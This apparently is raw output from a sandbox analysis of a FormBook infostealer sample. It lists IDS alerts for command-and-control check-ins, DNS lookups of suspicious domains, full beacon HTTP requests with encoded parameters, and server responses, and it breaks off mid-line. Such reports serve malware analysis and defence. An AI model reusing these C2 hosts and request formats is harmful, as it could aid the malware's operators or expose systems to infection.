                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50019 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 185.104.45.157:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50034 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50035 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50048 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50037 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50027 -> 185.104.45.157:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50049 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50050 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50053 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50030 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50052 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50051 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50031 -> 209.74.77.107:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.duwixushx.xyz
                Source: DNS query: www.oneeyetrousersnake.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 194.195.220.41 194.195.220.41
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CSLDE CSLDE
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49739
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49739
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
                Source: global trafficHTTP traffic detected: GET /px6j/?bbg=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKIcNk+JBVCRg1ULnR0r9g0wTL26GmNj8vjUZJtELrX7TXSA==&4Hph=tXCXkpKPT HTTP/1.1Host: www.sunnyz.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ffw/?bbg=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/cVOBm4LELiXS/YOPTGiXcR6tARW7Ah+E+UdM0p2Er0wI+Q==&4Hph=tXCXkpKPT HTTP/1.1Host: www.d48dk.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d3gs/?4Hph=tXCXkpKPT&bbg=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALe658TBhWz2YaAyzI8Rgx/2lRGZqP2V4f93z8nfndcdsgJQ== HTTP/1.1Host: www.8312zcksnu.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4nyz/?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.snyp.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u11p/?bbg=kZhtX7A2sH2Eo6iMIWGZUso0i5sc+RpFVMT48ed6Ly4yhf18n7pPOVMHRPIihFA/8qVQHA8l2MRLeM0A4ZXpHK5zp1AfcmEdh8Me18rVPXN1xmrP+jJ5uM9Xypqrvyuogg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.duwixushx.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ib68/?bbg=qBcx+6F+oW3FLMWCFGkku82ue0n+3hqnVOqcrGj635TZ+b/5EUsj5Zs7kPmyn50XK/Tp7ki26yO6xrdZPEzCUCLwZvbCuKVw+bGKkpnxeC2/cgva9NQSwRBKH/jO8oEkZw==&4Hph=tXCXkpKPT HTTP/1.1Host: www.maitreyatoys.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPT HTTP/1.1Host: www.44ynh.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /iwr0/?bbg=e58ykDXR7JLcMoNRWEYHn8cc5Pgwf9t/kt1uMD4eNiXxy32DdM8h+aEO1Z89nPF0w4/1A2XEUA4gZargWKfwgcGRrE4dAF8MmhPgLvSHdRT95UfShtNaVZFD9IYeOb8YiA==&4Hph=tXCXkpKPT HTTP/1.1Host: www.montero-beauty.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2eo9/?4Hph=tXCXkpKPT&bbg=7XmzYZMr38GxQ9PAC0sOj6+qqhhrckRH6Nq2/pV9l30WNGyrAQ9CTyNBBx9RcOn2QODlxsxyZKKfc2UgMRuej2Phu9qscykKfItb6htlbLHkk3vv6Dp9SyXAhpxA8WVGQQ== HTTP/1.1Host: www.beyondfitness.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /29r3/?bbg=3G351C0lqnMT5KSEhB6QkRv7ej9rv2/VXMsOqSS+pJvTAxAcXzEXZLJlfm59V9XHiWzt79CRV1JOIFYnv3Wo76qcp/vE/TTTBmL93e2sLUBUnoZ9o80wo25/oxpiL6JXtg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.50food.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p9ll/?bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1+CjUa2j1QQaHO4mbNQdsyhC9y7mIsh8JvmYw8eVSH73nhuf0Xl7ku83LF6dLivHkvOUWe3dGgjTeU1FcMTS2wwr3KqFBZ3Pmw==&4Hph=tXCXkpKPT HTTP/1.1Host: www.dymar.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t846/?bbg=4fXDidx2O/QZfth3GLJUvrPztavIjtsHM9AccgwO7Wsf+4yyKbVsNUq9n3baOtbXgE7PgS+t0KauVD8p9LNNPlTmJLw1k/V9vRHWZxkQ6THznCqf0VxFVE5mRi5gyV9wCg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.earbudsstore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jcfc/?bbg=0yEj10EZmitUhtYjdkKec5xdEI8NxyKfcM7U8ztUVuouZsC423bB43cLiOUB/IRFTMn/ihN/EtpU6HblaUashI5siqQp3v4hHHpGQ8dsEXU8uptspqs9cFl8luc9oYZGow==&4Hph=tXCXkpKPT HTTP/1.1Host: www.oneeyetrousersnake.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h8xm/?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPT HTTP/1.1Host: www.tals.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                Source: global trafficDNS traffic detected: DNS query: www.sunnyz.store
                Source: global trafficDNS traffic detected: DNS query: www.d48dk.top
                Source: global trafficDNS traffic detected: DNS query: www.8312zcksnu.bond
                Source: global trafficDNS traffic detected: DNS query: www.snyp.shop
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global trafficDNS traffic detected: DNS query: www.maitreyatoys.world
                Source: global trafficDNS traffic detected: DNS query: www.44ynh.top
                Source: global trafficDNS traffic detected: DNS query: www.montero-beauty.online
                Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                Source: global trafficDNS traffic detected: DNS query: www.50food.com
                Source: global trafficDNS traffic detected: DNS query: www.dymar.shop
                Source: global trafficDNS traffic detected: DNS query: www.earbudsstore.shop
                Source: global trafficDNS traffic detected: DNS query: www.oneeyetrousersnake.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: unknownHTTP traffic detected: POST /wlyolqts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 804
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:52:16 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:52:18 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:52:21 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:52:24 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:03 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 